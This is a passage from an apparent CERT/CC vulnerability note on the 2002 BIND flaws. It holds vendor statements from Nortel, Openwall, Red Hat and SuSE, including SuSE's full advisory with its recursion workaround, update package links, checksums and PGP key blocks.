1024D/22458A98 2000-07-10 Linux Mandrake Security Team \n<security linux-mandrake.com> \n` \n`- -----BEGIN PGP PUBLIC KEY BLOCK----- \nVersion: GnuPG v1.0.7 (GNU/Linux) \n` \n`mQGiBDlp594RBAC2tDozI3ZgQsE7XwxurJCJrX0L5vx7SDByR5GHDdWekGhdiday \nL4nfUax+SeR9SCoCgTgPW1xB8vtQc8/sinJlMjp9197a2iKM0FOcPlkpa3HcOdt7 \nWKJqQhlMrHvRcsivzcgqjH44GBBJIT6sygUF8k0lU6YnMHj5MPc/NGWt8wCg9vKo \nP0l5QVAFSsHtqcU9W8cc7wMEAJzQsAlnvPXDBfBLEH6u7ptWFdp0GvbSuG2wRaPl \nhynHvRiE01ZvwbJZXsPsKm1z7uVoW+NknKLunWKB5axrNXDHxCYJBzY3jTeFjsqx \nPFZkIEAQphLTkeXXelAjQ5u9tEshPswEtMvJvUgNiAfbzHfPYmq8D6x5xOw1IySg \n2e/LBACxr2UJYCCB2BZ3p508mAB0RpuLGukq+7UWiOizy+kSskIBg2O7sQkVY/Cs \niyGEo4XvXqZFMY39RBdfm2GY+WB/5NFiTOYJRKjfprP6K1YbtsmctsX8dG+foKsD \nLLFs7OuVfaydLQYp1iiN6D+LJDSMPM8/LCWzZsgr9EKJ8NXiyrQ6TGludXggTWFu \nZHJha2UgU2VjdXJpdHkgVGVhbSA8c2VjdXJpdHlAbGludXgtbWFuZHJha2UuY29t \nPohWBBMRAgAWBQI5aefeBAsKBAMDFQMCAxYCAQIXgAAKCRCaqNDQIkWKmK6LAKCy \n/NInDsaMSI+WHwrquwC5PZrcnQCeI+v3gUDsNfQfiKBvQSANu1hdulqIRgQQEQIA \nBgUCOtNVGQAKCRBZ5w3um0pAJJWQAKDUoL5He+mKbfrMaTuyU5lmRyJ0fwCgoFAP \nWdvQlu/kFjphF740XeOwtOqIRgQQEQIABgUCOu8A6QAKCRBynDnb9lq3CnpjAJ4w \nPk0SEE9U4r40IxWpwLU+wrWVugCdFfSPllPpZRCiaC7HwbFcfExRmPaIRgQQEQIA \nBgUCPI+UAwAKCRDniYrgcHcf8xK5AKCm/Mq8qP8GE0o1hEX22QsJMZwH5gCfZ72H \n8TacOb3oAmBdprf+K6gkdOiIRgQQEQIABgUCOtOieAAKCRCv2bZyU0yB80MeAJ9K \n+jXt0cKuaUonRU+CRGetk6t9dgCfTRRL6/puOKdD6md70+K5EBBSvsG0OE1hbmRy \nYWtlIExpbnV4IFNlY3VyaXR5IFRlYW0gPHNlY3VyaXR5QG1hbmRyYWtlc29mdC5j \nb20+iFcEExECABcFAjyPnuUFCwcKAwQDFQMCAxYCAQIXgAAKCRCaqNDQIkWKmFi+ \nAJsHhohgnU3ik4+gy3EdFlB2i/MBoACg6lHn5cnVvTcmgNccWxeNxLLZI5e5AQ0E \nOWnn7xAEAOQlTVY4TiNo5V/iP0J1xnqjqlqZsU7yEBKo/gZz6/+hx75RURe1ebiJ \n9F779FQbpJ9Epz1KLSXvq974rnVb813zuGdmgFyk+ryA/rTR2RQ8h+EoNkwmATzR \nxBXVJb57fFQjxOu4eNjZAtfII/YXb0uyXXrdr5dlJ/3eXrcO4p0XAAMFBACCxo6Z \n269s+A4v8C6Ui12aarOQcCDlV8cVG9LkyatU3FNTlnasqwo6EkaP572448weJWwN \n6SCXVl+xOYLiK0hL/6Jb/O9Agw75yUVdk+RMM2I4fNEi+y4hmfMh2siBv8yEkEvZ \njTcl3TpkTfzYky85tu433wmKaLFOv0WjBFSikohGBBgRAgAGBQI5aefvAAoJEJqo \n0NAiRYqYid0AoJgeWzXrEdIClBOSW5Q6FzqJJyaqAKC0Y9YI3UFlE4zSIGjcFlLJ \nEJGXlA== \n=yGlX \n- -----END PGP PUBLIC KEY BLOCK----- \n` \n`-----BEGIN PGP SIGNATURE----- \nVersion: GnuPG v1.0.7 (GNU/Linux) \n` \n`iD8DBQE9083UmqjQ0CJFipgRAnHHAKCpU7M0s+/oktmfBXt3YmuV0Fk9EgCgxqKw \n0TMmPB4TZgcFOv+PVexxc58= \n=01Zu \n-----END PGP SIGNATURE----- \n`\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23852283 Feedback>).\n\n### Nortel Networks __ Affected\n\nNotified: November 12, 2002 Updated: December 03, 2002 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\n\"NetID version 4.3.1 and below is affected by the vulnerabilities identified in CERT/CC Advisory CA-2002-31. A bulletin and patched builds are available from the following Nortel Networks support contacts: \n\n \nNorth America: 1-800-4NORTEL or 1-800-466-7835 \nEurope, Middle East and Africa: 00800 8008 9009, or +44 (0) 870 907 9009 \nOptivity NMS is not affected. \n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23852283 Feedback>).\n\n### Openwall GNU/*/Linux __ Affected\n\nNotified: November 12, 2002 Updated: December 03, 2002 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nBIND 4.9.10-OW2 includes the patch provided by ISC and thus has the two vulnerabilities affecting BIND 4 fixed. Previous versions of BIND 4.9.x-OW patches, if used properly, significantly reduced the impact of the \"named\" vulnerability. The patches are available at their usual location: \n\n\n \n<http://www.openwall.com/bind/> \nA patch against BIND 4.9.11 will appear as soon as this version is officially released, although it will likely be effectively the same as the currently available 4.9.10-OW2. \n \nIt hasn't been fully researched whether the resolver code in glibc,and in particular on Openwall GNU/*/Linux, shares any of the newly discovered BIND 4 resolver library vulnerabilities. Analysis is in progress. \n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23852283 Feedback>).\n\n### Red Hat Inc. __ Affected\n\nNotified: November 12, 2002 Updated: November 13, 2002 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nOlder releases (6.2, 7.0) of Red Hat Linux shipped with versions of BIND which may be vulnerable to these issues however a Red Hat security advisory in July 2002 upgraded all our supported distributions to BIND 9.2.1 which is not vulnerable to these issues.\n\nAll users who have BIND installed should ensure that they are running these updated versions of BIND. \n\n\n<http://rhn.redhat.com/errata/RHSA-2002-133.html> Red Hat Linux \n<http://rhn.redhat.com/errata/RHSA-2002-119.html> Advanced Server 2.1 \n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23852283 Feedback>).\n\n### SuSE Inc. __ Affected\n\nNotified: November 12, 2002 Updated: November 14, 2002 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\n`-----BEGIN PGP SIGNED MESSAGE----- \n`\n\n`______________________________________________________________________________ \n` \n` SuSE Security Announcement \n` \n` Package: bind8 \nAnnouncement-ID: SuSE-SA:2002:044 \nDate: Wed Nov 13 17:00:00 CET 2002 \nAffected products: (7.0), 7.1, 7.2, 7.3, 8.0, 8.1, \nSuSE Linux Database Server \nSuSE eMail Server III, 3.1 \nSuSE Firewall \nSuSE Linux Enterprise Server for S/390 \nSuSE Linux Connectivity Server \nSuSE Linux Enterprise Server 7 \nSuSE Linux Office Server \nVulnerability Type: remote command execution \nSeverity (1-10): 8 \nSuSE default package: yes \nCross References: CVE CAN-2002-1219, \nCAN-2002-1220, CAN-2002-1221, \n``<http://www.isc.org/products/BIND/bind-security.html>`` \n``<http://bvlive01.iss.net/issEn/delivery/xforce/alertdetail.jsp?oid=21469>`` \n` \n` Content of this advisory: \n1) security vulnerability resolved: Remote command execution \nin bind8 name server. \nproblem description, discussion, solution and upgrade information \n2) pending vulnerabilities, solutions, workarounds: BIND4, reports \nof trojanized tcpdump/libpcap \n3) standard appendix (further information) \n` \n`______________________________________________________________________________ \n` \n`1) problem description, brief discussion, solution, upgrade information \n` \n` The security research company ISS (Internet Security Services) \nhas discovered several vulnerabilities in the BIND8 name server, \nincluding a remotely exploitable buffer overflow. \n` \n` Circumstancial evidence suggests that the Internet Software \nConsortium (maintainer of BIND) has been made aware of these issues \nin mid-October. Distributors of Open Source operating systems, \nincluding SuSE, were notified of these vulnerabilities via CERT \napproximately 12 hours before the release of the advisories by ISS \nand ISC on Tue, Nov 12. This notification did not include any details \nthat allowed us to identify the vulnerable code, much less prepare \na fix. Mails to ISC went unanswered for 36 hours. \n` \n` The SuSE security team regrets that the Internet Software Consortium \nhas withheld vital information from the Internet community for so long, \nputting the majority of BIND users at risk. We would like to express \nour concern that the approach chosen by ISC and ISS is likely to \nerode trust in the security community if it becomes a model for dealing \nwith security issues. \n` \n` We apologize to SuSE customers for not being able to provide timely \nfixes for this problem. \n` \n` The advisories by ISS and ISC mention the following problems \nin detail: \n` \n` 1.There is a buffer overflow in the way named handles \nSIG records. This buffer overflow can be exploited to \nobtain access to the victim host under the account \nthe named process is running with. \n` \n`In order to exploit this problem, the attacker must \ncontrol an existing DNS domain, and must be allowed \nto perform a recursive query. \n` \n`The impact of this vulnerability is serious. \n` \n`In all SuSE products, named is configured to run as user \"named\" \nby default, so a potential attacker or virus/worm does not get \nimmediate root access. However, this is merely an additional \nobstacle the attacker faces. It may be possible for the attacker \nto exploit other, unpatched local vulnerabilities such as the \nrecently announced traceroute hole to obtain root privilege. It \nmay also be possible for an attacker to obtain increased privilege \nby manipulating the DNS zones served by the victim BIND server. \n` \n`We recommend to upgrade to the provided packages. If this is \nnot possible, we recommend to restrict recursive requests as a \nworkaround. This can be done by adding a statement such as the \nfollowing to /etc/named.conf: \n` \n`options { \n... existing options ... \n` \n`# Restrict recursive queries to 192.168.1.*, \n# except 192.168.1.254. \n# Order does matter. \nallow-recursion { \n!192.168.1.254; \n192.168.1/24; \n}; \n}; \n` \n`Alternatively, you can add \"recursion no;\" to the options \nsection to turn off recursion completely. \n` \n` 2.There are several Denial Of Service problems in BIND8 \nthat allow remote attackers to terminate the name server \nprocess. \n` \n`At least one of these vulnerabilities seems to be exploitable \neven when the attacker is not allowed to perform recursive \nqueries, so that the workaround suggested above is not \neffective against this bug. \n` \n` Both vulnerabilities are addressed by this update, using patches \noriginating from ISC. \n` \n` Due to the severity of this issue, we will provide update packages \nfor SuSE Linux 7.0, even though support for this product has officially \nbeen discontinued. \n` \n` Please download the update package for your distribution and verify its \nintegrity by the methods listed in section 3) of this announcement. \nThen, install the packages using the command \"rpm -Fhv file.rpm\" to apply \nthe update. After updating, make sure to restart the name server \nprocess by issuing the following command as root: \n` \n` rcnamed restart \n` \n` Our maintenance customers are being notified individually. The packages \nare being offered to install from the maintenance web. \n` \n \n \n \n` Intel i386 Platform: \n` \n` SuSE-8.1: \n``<ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/i586/bind8-8.2.4-260.i586.rpm>`` \ne1c07d8c1dd74374cc37e7fa692c9de1 \n``<ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/i586/bindutil-8.2.4-260.i586.rpm>`` \nb41734970bf88aa7b5d3debbf834b78d \n``<ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/i586/bind8-devel-8.2.4-260.i586.rpm>`` \nf7236e5e621725e100dbd204e2692a66 \nsource rpm(s): \n``<ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/src/bind8-8.2.4-260.src.rpm>`` \n02154fbdc935a2900d70ce6a16e96543 \n` \n` SuSE-8.0: \n``<ftp://ftp.suse.com/pub/suse/i386/update/8.0/n2/bind8-8.2.4-260.i386.rpm>`` \n07bc10c5c348c560084edb3c289459c9 \n``<ftp://ftp.suse.com/pub/suse/i386/update/8.0/n1/bindutil-8.2.4-260.i386.rpm>`` \n4db27e9ad4ae038d81422a0c5b9a34d0 \n``<ftp://ftp.suse.com/pub/suse/i386/update/8.0/n4/bind8-devel-8.2.4-260.i386.rpm>`` \na1b3958e0fbaed30ddecbf7753007dbf \nsource rpm(s): \n``<ftp://ftp.suse.com/pub/suse/i386/update/8.0/zq1/bind8-8.2.4-260.src.rpm>`` \n0b66ae2b5c462f041625919fed7ab089 \n` \n` SuSE-7.3: \n``<ftp://ftp.suse.com/pub/suse/i386/update/7.3/n2/bind8-8.2.4-261.i386.rpm>`` \nfe0654b3de751533874b08a860afea5e \n``<ftp://ftp.suse.com/pub/suse/i386/update/7.3/n1/bindutil-8.2.4-261.i386.rpm>`` \n043a8c1c0bb2cc23308a614dc7bdc0fe \n``<ftp://ftp.suse.com/pub/suse/i386/update/7.3/n2/bind8-devel-8.2.4-261.i386.rpm>`` \n59aca78f5aacb3ff7ecbc252eb760956 \nsource rpm(s): \n``<ftp://ftp.suse.com/pub/suse/i386/update/7.3/zq1/bind8-8.2.4-261.src.rpm>`` \n355add6397435262c597ad662e3df119 \n` \n` SuSE-7.2: \n``<ftp://ftp.suse.com/pub/suse/i386/update/7.2/n2/bind8-8.2.3-200.i386.rpm>`` \n1072a9fe708150bc14c70a72ca42dfd3 \n``<ftp://ftp.suse.com/pub/suse/i386/update/7.2/n1/bindutil-8.2.3-200.i386.rpm>`` \n0713d9b200db862110493233bc1d8321 \n``<ftp://ftp.suse.com/pub/suse/i386/update/7.2/n2/bind8-devel-8.2.3-200.i386.rpm>`` \nc681a91b38104cf47de4f4d454136a8a \nsource rpm(s): \n``<ftp://ftp.suse.com/pub/suse/i386/update/7.2/zq1/bind8-8.2.3-200.src.rpm>`` \n8f51737bc0c84b7be08fe3bb1d4012b4 \n` \n` SuSE-7.1: \n``<ftp://ftp.suse.com/pub/suse/i386/update/7.1/n2/bind8-8.2.3-200.i386.rpm>`` \nf2c14f81038d7ba952def27981b4599c \n``<ftp://ftp.suse.com/pub/suse/i386/update/7.1/n1/bindutil-8.2.3-200.i386.rpm>`` \n961a5403a41e8031c054a081ebf92ba5 \nsource rpm(s): \n``<ftp://ftp.suse.com/pub/suse/i386/update/7.1/zq1/bind8-8.2.3-200.src.rpm>`` \n7f3c9b95591fb22f00dc0b22cdd5fcf1 \n` \n` SuSE-7.0: \n``<ftp://ftp.suse.com/pub/suse/i386/update/7.0/n1/bind8-8.2.3-200.i386.rpm>`` \n0a6b9e23cefa5cd9f06660571ebf85ff \n``<ftp://ftp.suse.com/pub/suse/i386/update/7.0/n1/bindutil-8.2.3-200.i386.rpm>`` \n3a6e0e81c2d8b05ee01a2a0b9c26e9a4 \nsource rpm(s): \n``<ftp://ftp.suse.com/pub/suse/i386/update/7.0/zq1/bind8-8.2.3-200.src.rpm>`` \n1c2cb2e531fe2834de84b22ad714de68 \n` \n \n \n` Sparc Platform: \n` \n` SuSE-7.3: \n``<ftp://ftp.suse.com/pub/suse/sparc/update/7.3/n2/bind8-8.2.4-128.sparc.rpm>`` \nc08454b933ed2365d9d2ab1322803af6 \n``<ftp://ftp.suse.com/pub/suse/sparc/update/7.3/n1/bindutil-8.2.4-128.sparc.rpm>`` \n47e063be85fadfa2e5d0fce1746a34b5 \n``<ftp://ftp.suse.com/pub/suse/sparc/update/7.3/n2/bind8-devel-8.2.4-128.sparc.rpm>`` \n46a97b033cca0a01dcb39ef90275ce46 \nsource rpm(s): \n``<ftp://ftp.suse.com/pub/suse/sparc/update/7.3/zq1/bind8-8.2.4-128.src.rpm>`` \n827a7f56273c7a25ac40ffba728e9150 \n` \n \n \n \n` AXP Alpha Platform: \n` \n` SuSE-7.1: \n``<ftp://ftp.suse.com/pub/suse/axp/update/7.1/n2/bind8-8.2.3-139.alpha.rpm>`` \n77f39990fabacb545657236a60fecbe0 \n``<ftp://ftp.suse.com/pub/suse/axp/update/7.1/n1/bindutil-8.2.3-139.alpha.rpm>`` \n33bf9f28a7c9105c84216906694c7b7c \nsource rpm(s): \n``<ftp://ftp.suse.com/pub/suse/axp/update/7.1/zq1/bind8-8.2.3-139.src.rpm>`` \ndf347649fc98de695837a88452814ee6 \n` \n` SuSE-7.0: \n``<ftp://ftp.suse.com/pub/suse/axp/update/7.0/n1/bind8-8.2.3-139.alpha.rpm>`` \n23f307cda6a0eefb3d9f1a0439950bdd \n``<ftp://ftp.suse.com/pub/suse/axp/update/7.0/n1/bindutil-8.2.3-139.alpha.rpm>`` \n0789b49749d93ddd79192506cda00f7a \nsource rpm(s): \n``<ftp://ftp.suse.com/pub/suse/axp/update/7.0/zq1/bind8-8.2.3-139.src.rpm>`` \n356306a7f2c079e2726b3aa8da496e9b \n` \n \n \n` PPC Power PC Platform: \n` \n` SuSE-7.3: \n``<ftp://ftp.suse.com/pub/suse/ppc/update/7.3/n2/bind8-8.2.4-200.ppc.rpm>`` \n4cbeb4719625f8735ec03c27e1b27b85 \n``<ftp://ftp.suse.com/pub/suse/ppc/update/7.3/n1/bindutil-8.2.4-200.ppc.rpm>`` \n37fca302d72c819e713f8038d730a527 \n``<ftp://ftp.suse.com/pub/suse/ppc/update/7.3/n2/bind8-devel-8.2.4-200.ppc.rpm>`` \nf0f5cb7b808789606448a4d472c71400 \nsource rpm(s): \n``<ftp://ftp.suse.com/pub/suse/ppc/update/7.3/zq1/bind8-8.2.4-200.src.rpm>`` \n5c810e6f144d0f2875bb06d2331f50d8 \n` \n` SuSE-7.1: \n``<ftp://ftp.suse.com/pub/suse/ppc/update/7.1/n2/bind8-8.2.3-121.ppc.rpm>`` \n47fcc451954f03a915b57b500bd56c57 \n``<ftp://ftp.suse.com/pub/suse/ppc/update/7.1/n1/bindutil-8.2.3-121.ppc.rpm>`` \n2c0de3b64d5c3d62cb840a534911ef31 \nsource rpm(s): \n``<ftp://ftp.suse.com/pub/suse/ppc/update/7.1/zq1/bind8-8.2.3-121.src.rpm>`` \n235e142413ec35bcbdb86168b04b7a78 \n` \n` SuSE-7.0: \n``<ftp://ftp.suse.com/pub/suse/ppc/update/7.0/n1/bind8-8.2.3-121.ppc.rpm>`` \n44dc01f6b4fae1dfd87874db6d42e8d9 \n``<ftp://ftp.suse.com/pub/suse/ppc/update/7.0/n1/bindutil-8.2.3-121.ppc.rpm>`` \nd46f45bef0f12c3c5b071443ac9e7f13 \nsource rpm(s): \n``<ftp://ftp.suse.com/pub/suse/ppc/update/7.0/zq1/bind8-8.2.3-121.src.rpm>`` \n1bac32496ae66d4b0e35bc34d4e500ff \n` \n`______________________________________________________________________________ \n` \n`2) Pending vulnerabilities in SuSE Distributions and Workarounds: \n` \n` BIND4 \nIn addition to the vulnerabilities in BIND8 discussed above, ISS \nreport several vulnerabilities in BIND4. As stated previously, \nSuSE has discontinued support for BIND4 and recommends that \nusers upgrade to BIND8 as soon as possible. \n` \n` Trojaned libpcap/tcpdump \nThere have been reports that the source packages of tcpdump and \nlibpcap available from several FTP servers have been modified to \ninclude a trojan. We have checked our source packages for this \nand found them to be clean. \n` \n`______________________________________________________________________________ \n` \n`3) standard appendix: authenticity verification, additional information \n` \n` - Package authenticity verification: \n` \n` SuSE update packages are available on many mirror ftp servers all over \nthe world. While this service is being considered valuable and important \nto the free and open source software community, many users wish to be \nsure about the origin of the package and its content before installing \nthe package. There are two verification methods that can be used \nindependently from each other to prove the authenticity of a downloaded \nfile or rpm package: \n1) md5sums as provided in the (cryptographically signed) announcement. \n2) using the internal gpg signatures of the rpm package. \n` \n` 1) execute the command \nmd5sum <name-of-the-file.rpm> \nafter you downloaded the file from a SuSE ftp server or its mirrors. \nThen, compare the resulting md5sum with the one that is listed in the \nannouncement. Since the announcement containing the checksums is \ncryptographically signed (usually using the key security@suse.de), \nthe checksums show proof of the authenticity of the package. \nWe disrecommend to subscribe to security lists which cause the \nemail message containing the announcement to be modified so that \nthe signature does not match after transport through the mailing \nlist software. \nDownsides: You must be able to verify the authenticity of the \nannouncement in the first place. If RPM packages are being rebuilt \nand a new version of a package is published on the ftp server, all \nmd5 sums for the files are useless. \n` \n` 2) rpm package signatures provide an easy way to verify the authenticity \nof an rpm package. Use the command \nrpm -v --checksig <file.rpm> \nto verify the signature of the package, where <file.rpm> is the \nfilename of the rpm package that you have downloaded. Of course, \npackage authenticity verification can only target an un-installed rpm \npackage file. \nPrerequisites: \na) gpg is installed \nb) The package is signed using a certain key. The public part of this \nkey must be installed by the gpg program in the directory \n~/.gnupg/ under the user's home directory who performs the \nsignature verification (usually root). You can import the key \nthat is used by SuSE in rpm packages for SuSE Linux by saving \nthis announcement to a file (\"announcement.txt\") and \nrunning the command (do \"su -\" to be root): \ngpg --batch; gpg < announcement.txt | gpg --import \nSuSE Linux distributions version 7.1 and thereafter install the \nkey \"build@suse.de\" upon installation or upgrade, provided that \nthe package gpg is installed. The file containing the public key \nis placed at the top-level directory of the first CD (pubring.gpg) \nand at ``<ftp://ftp.suse.com/pub/suse/pubring.gpg-build.suse.de>`` . \n` \n \n` - SuSE runs two security mailing lists to which any interested party may \nsubscribe: \n` \n` suse-security@suse.com \n- general/linux/SuSE security discussion. \nAll SuSE security announcements are sent to this list. \nTo subscribe, send an email to \n<suse-security-subscribe@suse.com>. \n` \n` suse-security-announce@suse.com \n- SuSE's announce-only mailing list.` \n` Only SuSE's security announcements are sent to this list. \nTo subscribe, send an email to \n<suse-security-announce-subscribe@suse.com>. \n` \n` For general information or the frequently asked questions (faq) \nsend mail to: \n<suse-security-info@suse.com> or \n<suse-security-faq@suse.com> respectively. \n` \n` ===================================================================== \nSuSE's security contact is <security@suse.com> or <security@suse.de>. \nThe <security@suse.de> public key is listed below. \n===================================================================== \n______________________________________________________________________________ \n` \n` The information in this advisory may be distributed or reproduced, \nprovided that the advisory is not modified in any way. In particular, \nit is desired that the clear-text signature shows proof of the \nauthenticity of the text. \nSuSE Linux AG makes no warranties of any kind whatsoever with respect \nto the information contained in this security advisory. \n` \n`Type Bits/KeyID Date User ID \npub 2048R/3D25D3D9 1999-03-06 SuSE Security Team <security@suse.de> \npub 1024D/9C800ACA 2000-10-19 SuSE Package Signing Key <build@suse.de> \n` \n`- -----BEGIN PGP PUBLIC KEY BLOCK----- \nVersion: GnuPG v1.0.6 (GNU/Linux) \nComment: For info see ``<http://www.gnupg.org>`` \n` \n`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 \nDgCfZ5Wj+f7cnYpFZI6GkAyyczG09sE= \n=LRKC \n- -----END 